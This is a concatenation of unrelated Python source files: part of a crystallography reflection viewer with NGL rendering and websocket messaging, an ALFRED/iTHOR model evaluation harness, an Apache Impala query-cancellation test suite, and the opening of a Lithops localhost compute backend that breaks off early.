self.AddVector(0,0,0, 0,scale,0, False, label="b", r=0.8, g=0.5, b=0.8, radius=rad)
self.AddVector(0,0,0, 0,0,scale, False, label="c", r=0.8, g=0.8, b=0.5, radius=rad)
self.AddVector(scale,0,0, scale,scale,0, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.AddVector(0,scale,0, scale,scale,0, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.AddVector(0,0,scale, scale,0,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.AddVector(0,0,scale, 0,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.AddVector(0,scale,scale, scale,scale,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.AddVector(scale,0,scale, scale,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.AddVector(scale,0,0, scale,0,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.AddVector(0,scale,0, 0,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.AddVector(scale,scale,0, scale,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad, name="unitcell")
self.mprint( "Adding real space unit cell", verbose=1)
def DrawReciprocalUnitCell(self, scale=1):
if scale is None:
self.RemoveVectors("reciprocal_unitcell")
self.mprint( "Removing reciprocal unit cell", verbose=1)
return
rad = 0.2 # 0.05 * scale
self.AddVector(0,0,0, scale,0,0, label="a*", r=0.5, g=0.3, b=0.3, radius=rad)
self.AddVector(0,0,0, 0,scale,0, label="b*", r=0.3, g=0.5, b=0.3, radius=rad)
self.AddVector(0,0,0, 0,0,scale, label="c*", r=0.3, g=0.3, b=0.5, radius=rad)
self.AddVector(scale,0,0, scale,scale,0, r=0.3, g=0.5, b=0.3, radius=rad)
self.AddVector(0,scale,0, scale,scale,0, r=0.5, g=0.3, b=0.3, radius=rad)
self.AddVector(0,0,scale, scale,0,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.AddVector(0,0,scale, 0,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.AddVector(0,scale,scale, scale,scale,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.AddVector(scale,0,scale, scale,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.AddVector(scale,0,0, scale,0,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.AddVector(0,scale,0, 0,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.AddVector(scale,scale,0, scale,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad, name="reciprocal_unitcell")
self.mprint( "Adding reciprocal unit cell", verbose=1)
def GetUnitcellScales(self):
spanmin, spanmax = ( self.miller_array.index_span().min(), self.miller_array.index_span().max())
uc = self.miller_array.unit_cell()
vec = (1.0, 1.0, 1.0)
# uc.reciprocal_space_vector() only takes integer miller indices so compute
# the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
vec1 = vec * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_bodydiagonal_length = vec1.length()
reciprocspanmaxvec = spanmax * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmax_length = reciprocspanmaxvec.length()
reciprocspanminvec = spanmax * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmin_length = reciprocspanminvec.length()
reciprocspan_length = max(reciproc_spanmax_length, reciproc_spanmin_length)
self.reciproc_scale = reciprocspan_length / reciproc_bodydiagonal_length
# for real space vector
vec2 = vec * matrix.sqr(uc.orthogonalization_matrix())
bodydiagonal_length = vec2.length()
self.realspace_scale = self.scene.renderscale * reciprocspan_length / bodydiagonal_length
def fix_orientation(self, val):
if val:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
def clip_plane_vector(self, a, b, c, hkldist=0.0,
clipwidth=None, fixorientation=True, is_parallel=False, isreciprocal=False):
# create clip plane oriented parallel or perpendicular to abc vector
if a==0.0 and b==0.0 and c==0.0 or clipwidth is None:
self.RemoveVectorsNoClipPlane()
return
self.mprint("Applying clip plane to reflections", verbose=1)
self.RemoveVectors("clip_vector")
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
a, b, c, isreciprocal=isreciprocal, name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
if is_parallel:
self.vecrotmx = self.PointVectorParallelToClipPlane()
else:
self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
if self.cameraPosZ is None and self.viewmtrx is not None:
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
halfdist = self.cameraPosZ + hkldist # self.viewer.boundingZ*0.5
if clipwidth == 0.0:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, -self.cameraPosZ)
#if hkldist < 0.0:
# self.TranslateHKLpoints(a, b, c, hkldist)
scale = max(self.miller_array.index_span().max())/10
def RemoveVectorsNoClipPlane(self):
self.EnableMouseRotation()
self.RemoveVectors()
self.SetClipPlaneDistances(0, 0)
self.TranslateHKLpoints(0, 0, 0, 0.0)
def SetMouseSpeed(self, trackspeed):
msg = str(trackspeed)
self.AddToBrowserMsgQueue("SetMouseSpeed", msg)
#self.GetMouseSpeed() # TODO: fix wait time
def GetMouseSpeed(self):
self.ngl_settings.mouse_sensitivity = None
self.AddToBrowserMsgQueue("GetMouseSpeed", "")
if self.WaitforHandshake():
nwait = 0
while self.ngl_settings.mouse_sensitivity is None and nwait < 5:
#time.sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
if cameraPosZ is None:
cameraPosZ = self.cameraPosZ
msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
self.AddToBrowserMsgQueue("SetClipPlaneDistances", msg)
def GetClipPlaneDistances(self):
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.AddToBrowserMsgQueue("GetClipPlaneDistances", "")
if self.WaitforHandshake():
nwait = 0
while self.clipFar is None and nwait < self.handshakewait:
#time.sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
%(self.clipNear, self.clipFar, self.cameraPosZ), 2)
return (self.clipNear, self.clipFar, self.cameraPosZ)
def GetBoundingBox(self):
self.boundingX = 0.0
self.boundingY = 0.0
self.boundingZ = 0.0
self.AddToBrowserMsgQueue("GetBoundingBox", "")
if self.WaitforHandshake():
nwait = 0
while self.boundingX is None and nwait < self.handshakewait:
#time.sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("boundingXYZ: %s, %s %s" \
%(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
return (self.boundingX, self.boundingY, self.boundingZ)
def RemoveVectors(self, reprname=""):
self.AddToBrowserMsgQueue("RemoveVectors", reprname )
def SetAutoView(self):
rotmx = self.Euler2RotMatrix( ( 0.0, 0.0, 0.0 ) )
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
self.AddToBrowserMsgQueue("SetAutoView" )
def TestNewFunction(self):
self.AddToBrowserMsgQueue("Testing")
def MakeImage(self, filename):
self.imagename = filename
self.AddToBrowserMsgQueue("MakeImage")
def DisableMouseRotation(self): # disable rotating with the mouse
self.AddToBrowserMsgQueue("DisableMouseRotation")
def EnableMouseRotation(self): # enable rotating with the mouse
self.AddToBrowserMsgQueue("EnableMouseRotation")
def ReOrientStage(self):
if self.viewmtrx:
self.AddToBrowserMsgQueue("SetAutoView", self.viewmtrx)
def Euler2RotMatrix(self, eulerangles):
eulerangles1 = eulerangles
radangles = [e*math.pi/180.0 for e in eulerangles1]
RotMx = scitbx.math.euler_angles_as_matrix(radangles)
return RotMx
def RotateMxStage(self, rotmx, quietbrowser=True):
if self.cameraPosZ is None:
return
scaleRot = rotmx * self.cameraPosZ
ortrot = scaleRot.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateStage", msg)
def TranslateHKLpoints(self, h, k, l, mag):
# cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
#vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
hkl_vec = flex.vec3_double( [(h,k,l)])
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
cartvec = hkl_vec * rfracmx
if cartvec.norm()==0.0 or mag==0.0:
svec = (0, 0, 0)
else:
#cartvec = (mag/cartvec.norm()) * cartvec
cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
#svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
svec = cartvec[0]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
str_vec = str(svec)
str_vec = str_vec.replace("(", "")
str_vec = str_vec.replace(")", "")
msg = str_vec + "\n"
self.AddToBrowserMsgQueue("TranslateHKLpoints", msg)
def InjectNewReflections(self, proc_array):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(proc_array, 0, copy.deepcopy(self.viewerparams), { } , None)
strdata = ""
hklscene = hklscenes[0]
self.scene = hklscene
for i,radius in enumerate(hklscene.radii):
ftuple = (hklscene.points[i][0], hklscene.points[i][1], hklscene.points[i][2],
hklscene.colors[i][0], hklscene.colors[i][1], hklscene.colors[i][2], radius )
strdata += "%s,%s,%s,%s,%s,%s,%s," % roundoff(ftuple, 2)
strdata = strdata[:-1] # avoid the last comma
self.isinjected = True
self.AddToBrowserMsgQueue("InjectNewReflections", strdata)
ngl_philstr = """
mouse_sensitivity = 0.2
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.70
.type = float
fontsize = 9
.type = int
show_tooltips = none *click hover
.type = choice
fixorientation = False
.type = bool
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
"""
Reset NGL settings to their default values as specified in the phil definition string
"""
#global NGLmaster_phil
#global ngl_philstr
#global NGLparams
NGLparams = NGLmaster_phil.fetch(source = libtbx.phil.parse( ngl_philstr) ).extract()
def NGLsettings():
"""
Get a global phil parameters object containing some NGL settings
"""
#global NGLparams
return NGLparams
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
#websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
# WS server example
import asyncio
import websockets
async def hello(websocket, path):
while True:
name = await websocket.recv()
print(f"< {name}")
greeting = f"Hello {name}!"
await websocket.send(greeting)
if name=="STOP":
return
await asyncio.sleep(0.2)
start_server = websockets.serve(hello, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# WS client example
import asyncio
import websockets
async def hello():
uri = "ws://localhost:8765"
async with websockets.connect(uri) as websocket:
while True:
name = input("What's your name?\n" )
await websocket.send(name)
print(f"> {name}")
greeting = await websocket.recv()
print(f"< {greeting}")
asyncio.get_event_loop().run_until_complete(hello())
"""
|
eval.py | import os
import json
import pprint
import random
import time
import torch
import torch.multiprocessing as mp
from data.preprocess import Dataset
from importlib import import_module
# import threading
class EvalMMT(object):
"""iTHOR-based interactive evaluation
Based on eval.py form the original Alfred repository.
Modified to fit the proposed MMT model
"""
def __init__(self, args, dataset, model, detector, multiproc_manager):
# args and manager
self.args = args
self.manager = multiproc_manager #run iThor env in parallel
if '_' in self.args.eval_split:
self.eval_splits = [self.args.eval_split]
elif self.args.eval_split == 'valid':
self.eval_splits = ['valid_seen', 'valid_unseen']
elif self.args.eval_split == 'test':
self.eval_splits = ['tests_seen', 'tests_unseen']
# setup Alfred dataset and get vocabularies
self.dataset = dataset
self.pp_path = dataset.pp_path
self.vocabs = {}
self.vocabs['in_vocab_action'] = self.dataset.dec_in_vocab
self.vocabs['out_vocab_high_type'] = self.dataset.dec_out_vocab_high
self.vocabs['out_vocab_low_type'] = self.dataset.dec_out_vocab_low
self.vocabs['out_vocab_arg'] = self.dataset.dec_out_vocab_arg
# setup the model to be evaluated
self.model = model
if isinstance(model, dict):
for m in model.values():
m.share_memory()
m.eval()
else:
self.model.share_memory()
self.model.eval()
# setup the object detector
self.detector = detector
self.detector.share_memory()
self.detector.eval()
# prepare the task directories for evaluation
self.queue_tasks()
def queue_tasks(self):
self.stats = self.manager.dict()
self.results = self.manager.dict()
# queue tasks
self.task_queue = self.manager.Queue()
for split in self.eval_splits:
# random.shuffle(self.dataset.dataset_splits[split])
for task in self.dataset.dataset_splits[split]:
task_path = os.path.join(self.pp_path, split, task['task'])
self.task_queue.put((task_path, task['repeat_idx']))
if self.args.fast_epoch and self.task_queue.qsize() == 3:
break
else:
continue
break
self.stats['task_num'] = self.task_queue.qsize()
print('Total task num:', self.task_queue.qsize())
def spawn_threads(self):
'''
spawn multiple threads to run eval in parallel
'''
self.stats['start_time'] = time.time()
# start threads
threads = []
lock = self.manager.Lock()
for n in range(self.args.num_threads):
thread = mp.Process(target=self.run, args=(n, self.model, self.detector,
self.vocabs, self.task_queue, self.args, lock, self.stats, self.results))
thread.start()
threads.append(thread)
for t in threads:
t.join()
# self.save_results()
@classmethod
def setup_scene(cls, env, traj_data, args, reward_type='dense'):
'''
intialize the scene and agent from the task info
'''
# scene setup
scene_num = traj_data['scene']['scene_num']
object_poses = traj_data['scene']['object_poses']
dirty_and_empty = traj_data['scene']['dirty_and_empty']
object_toggles = traj_data['scene']['object_toggles']
scene_name = 'FloorPlan%d' % scene_num
env.reset(scene_name)
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
# initialize to start position
env.step(dict(traj_data['scene']['init_action']))
# setup task for reward
env.set_task(traj_data, args, reward_type=reward_type)
@classmethod
def run(cls, model, detector, vocabs, task_queue, args, lock, stats, results):
raise NotImplementedError()
@classmethod
def evaluate(cls, env, model, detector, vocabs, traj_data, args, lock, stats, results):
raise NotImplementedError()
def save_results(self):
raise NotImplementedError()
def create_stats(self):
raise NotImplementedError()
def start(self):
raise NotImplementedError()
class Eval(object):
# tokens
STOP_TOKEN = "<<stop>>"
SEQ_TOKEN = "<<seg>>"
TERMINAL_TOKENS = [STOP_TOKEN, SEQ_TOKEN]
def __init__(self, args, manager):
# args and manager
self.args = args
self.manager = manager
# load splits
with open(self.args.splits) as f:
self.splits = json.load(f)
pprint.pprint({k: len(v) for k, v in self.splits.items()})
# load model
print("Loading: ", self.args.model_path)
M = import_module(self.args.model)
self.model, optimizer = M.Module.load(self.args.model_path, self.args)
self.model.share_memory()
self.model.eval()
self.model.test_mode = True
# updated args
self.model.args.dout = self.args.model_path.replace(self.args.model_path.split('/')[-1], '')
self.model.args.data = self.args.data if self.args.data else self.model.args.data
# preprocess and save
if args.preprocess:
print("\nPreprocessing dataset and saving to %s folders ... This is will take a while. Do this once as required:" % self.model.args.pp_folder)
self.model.args.fast_epoch = self.args.fast_epoch
dataset = Dataset(self.model.args, self.model.vocab)
dataset.preprocess_splits(self.splits)
# load resnet
args.visual_model = 'resnet18'
self.resnet = Resnet(args, eval=True, share_memory=True, use_conv_feat=True)
# gpu
if self.args.gpu:
self.model = self.model.to(torch.device('cuda'))
# success and failure lists
self.create_stats()
# set random seed for shuffling
random.seed(int(time.time()))
def queue_tasks(self):
'''
create queue of trajectories to be evaluated
'''
task_queue = self.manager.Queue()
files = self.splits[self.args.eval_split]
# debugging: fast epoch
if self.args.fast_epoch:
files = files[:16]
if self.args.shuffle:
random.shuffle(files)
for traj in files:
task_queue.put(traj)
return task_queue
def spawn_threads(self):
'''
spawn multiple threads to run eval in parallel
'''
task_queue = self.queue_tasks()
# start threads
threads = []
lock = self.manager.Lock()
for n in range(self.args.num_threads):
thread = mp.Process(target=self.run, args=(self.model, self.resnet, task_queue, self.args, lock,
self.successes, self.failures, self.results))
thread.start()
threads.append(thread)
for t in threads:
t.join()
# lock = threading.Lock()
# for n in range(self.args.num_threads):
# thread = threading.Thread(target=self.run, args=(self.model, self.resnet, task_queue, self.args, lock, self.successes, self.failures, self.results))
# threads.append(thread)
# thread.start()
# time.sleep(1)
# save
self.save_results()
@classmethod
def setup_scene(cls, env, traj_data, r_idx, args, reward_type='dense'):
'''
intialize the scene and agent from the task info
'''
# scene setup
scene_num = traj_data['scene']['scene_num']
object_poses = traj_data['scene']['object_poses']
dirty_and_empty = traj_data['scene']['dirty_and_empty']
object_toggles = traj_data['scene']['object_toggles']
scene_name = 'FloorPlan%d' % scene_num
env.reset(scene_name)
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
# initialize to start position
env.step(dict(traj_data['scene']['init_action']))
# print goal instr
print("Task: %s" % (traj_data['turk_annotations']['anns'][r_idx]['task_desc']))
# setup task for reward
env.set_task(traj_data, args, reward_type=reward_type)
@classmethod
def run(cls, model, resnet, task_queue, args, lock, successes, failures):
raise NotImplementedError()
@classmethod
def evaluate(cls, env, model, r_idx, resnet, traj_data, args, lock, successes, failures):
raise NotImplementedError()
def save_results(self):
raise NotImplementedError()
def create_stats(self):
raise NotImplementedError()
|
test_cancellation.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests query cancellation using the ImpalaService.Cancel API
#
import pytest
import threading
from time import sleep
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.test_vector import ImpalaTestDimension
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.verifiers.metric_verifier import MetricVerifier
# PRIMARY KEY for lineitem
LINEITEM_PK = 'l_orderkey, l_partkey, l_suppkey, l_linenumber'
# Queries to execute, mapped to a unique PRIMARY KEY for use in CTAS with Kudu. If None
# is specified for the PRIMARY KEY, it will not be used in a CTAS statement on Kudu.
# Use the TPC-H dataset because tables are large so queries take some time to execute.
QUERIES = {'select l_returnflag from lineitem' : None,
'select count(l_returnflag) pk from lineitem' : 'pk',
'select * from lineitem limit 50' : LINEITEM_PK,
'compute stats lineitem' : None,
'select * from lineitem order by l_orderkey' : LINEITEM_PK}
QUERY_TYPE = ["SELECT", "CTAS"]
# Time to sleep between issuing query and canceling. Favor small times since races
# are prone to occur more often when the time between RPCs is small.
CANCEL_DELAY_IN_SECONDS = [0, 0.01, 0.1, 1, 4]
# Number of times to execute/cancel each query under test
NUM_CANCELATION_ITERATIONS = 1
# Test cancellation on both running and hung queries. Node ID 0 is the scan node
WAIT_ACTIONS = [None, '0:GETNEXT:WAIT']
# Verify that failed CancelFInstances() RPCs don't lead to hung queries
FAIL_RPC_ACTIONS = [None, 'COORD_CANCEL_QUERY_FINSTANCES_RPC:FAIL']
# Test cancelling when there is a resource limit.
CPU_LIMIT_S = [0, 100000]
# Verify close rpc running concurrently with fetch rpc. The two cases verify:
# False: close and fetch rpc run concurrently.
# True: cancel rpc is enough to ensure that the fetch rpc is unblocked.
JOIN_BEFORE_CLOSE = [False, True]
# Extra dimensions to test order by without limit
SORT_QUERY = 'select * from lineitem order by l_orderkey'
SORT_CANCEL_DELAY = range(6, 10)
SORT_BUFFER_POOL_LIMIT = ['0', '300m'] # Test spilling and non-spilling sorts.
class TestCancellation(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestCancellation, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('query', *QUERIES.keys()))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('query_type', *QUERY_TYPE))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('cancel_delay', *CANCEL_DELAY_IN_SECONDS))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('wait_action', *WAIT_ACTIONS))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('fail_rpc_action', *FAIL_RPC_ACTIONS))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('join_before_close', *JOIN_BEFORE_CLOSE))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('buffer_pool_limit', 0))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('cpu_limit_s', *CPU_LIMIT_S))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('query_type') != 'CTAS' or (\
v.get_value('table_format').file_format in ['text', 'parquet', 'kudu'] and\
v.get_value('table_format').compression_codec == 'none'))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('exec_option')['batch_size'] == 0)
# Ignore 'compute stats' queries for the CTAS query type.
cls.ImpalaTestMatrix.add_constraint(
lambda v: not (v.get_value('query_type') == 'CTAS' and
v.get_value('query').startswith('compute stats')))
# Ignore CTAS on Kudu if there is no PRIMARY KEY specified.
cls.ImpalaTestMatrix.add_constraint(
lambda v: not (v.get_value('query_type') == 'CTAS' and
v.get_value('table_format').file_format == 'kudu' and
QUERIES[v.get_value('query')] is None))
# tpch tables are not generated for hbase as the data loading takes a very long time.
# TODO: Add cancellation tests for hbase.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format != 'hbase')
if cls.exploration_strategy() != 'core':
NUM_CANCELATION_ITERATIONS = 3
def cleanup_test_table(self, table_format):
self.execute_query("drop table if exists ctas_cancel", table_format=table_format)
def execute_cancel_test(self, vector):
query = vector.get_value('query')
query_type = vector.get_value('query_type')
if query_type == "CTAS":
self.cleanup_test_table(vector.get_value('table_format'))
file_format = vector.get_value('table_format').file_format
if file_format == 'kudu':
assert QUERIES.has_key(query) and QUERIES[query] is not None,\
"PRIMARY KEY for query %s not specified" % query
query = "create table ctas_cancel primary key (%s) "\
"partition by hash partitions 3 stored as kudu as %s" %\
(QUERIES[query], query)
else:
query = "create table ctas_cancel stored as %sfile as %s" %\
(file_format, query)
join_before_close = vector.get_value('join_before_close')
wait_action = vector.get_value('wait_action')
fail_rpc_action = vector.get_value('fail_rpc_action')
debug_action = "|".join(filter(None, [wait_action, fail_rpc_action]))
vector.get_value('exec_option')['debug_action'] = debug_action
vector.get_value('exec_option')['buffer_pool_limit'] =\
vector.get_value('buffer_pool_limit')
vector.get_value('exec_option')['cpu_limit_s'] = vector.get_value('cpu_limit_s')
# Execute the query multiple times, cancelling it each time.
for i in xrange(NUM_CANCELATION_ITERATIONS):
handle = self.execute_query_async(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
def fetch_results():
threading.current_thread().fetch_results_error = None
threading.current_thread().query_profile = None
try:
new_client = self.create_impala_client()
new_client.fetch(query, handle)
except ImpalaBeeswaxException as e:
threading.current_thread().fetch_results_error = e
threading.current_thread().query_profile = \
self.impalad_test_service.get_thrift_profile(handle.get_handle().id)
thread = threading.Thread(target=fetch_results)
thread.start()
sleep(vector.get_value('cancel_delay'))
assert self.client.get_state(handle) != self.client.QUERY_STATES['EXCEPTION']
cancel_result = self.client.cancel(handle)
assert cancel_result.status_code == 0,\
'Unexpected status code from cancel request: %s' % cancel_result
if join_before_close:
thread.join()
close_error = None
try:
self.client.close_query(handle)
except ImpalaBeeswaxException as e:
close_error = e
# Before accessing fetch_results_error we need to join the fetch thread
thread.join()
# IMPALA-2063 Cancellation tests may generate profile text that is otherwise hard
# to reproduce for testing mis-formatting.
profile = thread.query_profile
if profile:
for (k, v) in profile.nodes[1].info_strings.iteritems():
assert v == v.rstrip(), \
"Mis-formatted profile text: %s %s" % (k, v)
# "Plan" text may be strangely formatted.
assert k == 'Plan' or '\n\n' not in v, \
"Mis-formatted profile text: %s %s" % (k, v)
if thread.fetch_results_error is None:
# If the fetch rpc didn't result in CANCELLED (and auto-close the query) then
# the close rpc should have succeeded.
assert close_error is None
elif close_error is None:
# If the close rpc succeeded, then the fetch rpc should have either succeeded,
# failed with 'Cancelled' or failed with 'Invalid query handle' (if the close
# rpc occured before the fetch rpc).
if thread.fetch_results_error is not None:
assert 'Cancelled' in str(thread.fetch_results_error) or \
('Invalid query handle' in str(thread.fetch_results_error) \
and not join_before_close)
else:
# If the close rpc encountered an exception, then it must be due to fetch
# noticing the cancellation and doing the auto-close.
assert 'Invalid or unknown query handle' in str(close_error)
assert 'Cancelled' in str(thread.fetch_results_error)
if query_type == "CTAS":
self.cleanup_test_table(vector.get_value('table_format'))
# TODO: Add some additional verification to check to make sure the query was
# actually canceled
# Executing the same query without canceling should work fine. Only do this if the
# query has a limit or aggregation
if not debug_action and ('count' in query or 'limit' in query):
self.execute_query(query, vector.get_value('exec_option'))
def teardown_method(self, method):
# For some reason it takes a little while for the query to get completely torn down
# when the debug action is WAIT, causing TestValidateMetrics.test_metrics_are_zero to
# fail. Introducing a small delay allows everything to quiesce.
# TODO: Figure out a better way to address this
sleep(1)
class TestCancellationParallel(TestCancellation):
@classmethod
def add_test_dimensions(cls):
super(TestCancellationParallel, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v: v.get_value('query_type') != 'CTAS')
def test_cancel_select(self, vector):
self.execute_cancel_test(vector)
class TestCancellationSerial(TestCancellation):
@classmethod
def add_test_dimensions(cls):
super(TestCancellationSerial, cls).add_test_dimensions()
# Only run the insert tests in this suite - they need to be serial to allow us to
# check for file handle leaks.
cls.ImpalaTestMatrix.add_constraint(lambda v: v.get_value('query_type') == 'CTAS')
# This test suite is slow because it executes serially. Restrict some of the params
# that are not interesting for inserts.
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('cpu_limit_s') == CPU_LIMIT_S[0])
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('join_before_close') == JOIN_BEFORE_CLOSE[0])
if cls.exploration_strategy() != 'exhaustive':
# Only run a single 'cancel_delay' option in core.
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('cancel_delay') == CANCEL_DELAY_IN_SECONDS[3])
else:
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('cancel_delay') != CANCEL_DELAY_IN_SECONDS[0])
@pytest.mark.execute_serially
def test_cancel_insert(self, vector):
self.execute_cancel_test(vector)
metric_verifier = MetricVerifier(self.impalad_test_service)
metric_verifier.verify_no_open_files(timeout=10)
class TestCancellationFullSort(TestCancellation):
@classmethod
def add_test_dimensions(cls):
super(TestCancellationFullSort, cls).add_test_dimensions()
# Override dimensions to only execute the order-by without limit query.
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('query', SORT_QUERY))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('query_type', 'SELECT'))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('cancel_delay', *SORT_CANCEL_DELAY))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('buffer_pool_limit', *SORT_BUFFER_POOL_LIMIT))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('fail_rpc_action') == FAIL_RPC_ACTIONS[0])
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format =='parquet' and\
v.get_value('table_format').compression_codec == 'none')
def test_cancel_sort(self, vector):
self.execute_cancel_test(vector)
|
localhost.py | #
# (C) Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shlex
import queue
import signal
import lithops
import logging
import shutil
import threading
import subprocess as sp
from shutil import copyfile
from pathlib import Path
from lithops.constants import RN_LOG_FILE, TEMP, LITHOPS_TEMP_DIR, COMPUTE_CLI_MSG, JOBS_PREFIX
from lithops.utils import is_lithops_worker, is_unix_system
logger = logging.getLogger(__name__)
RUNNER = os.path.join(LITHOPS_TEMP_DIR, 'runner.py')
LITHOPS_LOCATION = os.path.dirname(os.path.abspath(lithops.__file__))
class LocalhostHandler:
"""
A localhostHandler object is used by invokers and other components to access
underlying localhost backend without exposing the implementation details.
"""
def __init__(self, localhost_config):
logger.debug('Creating Localhost compute client')
self.config = localhost_config
self.env = {} # dict to store environments
self.job_queue = queue.Queue()
self.job_manager = None
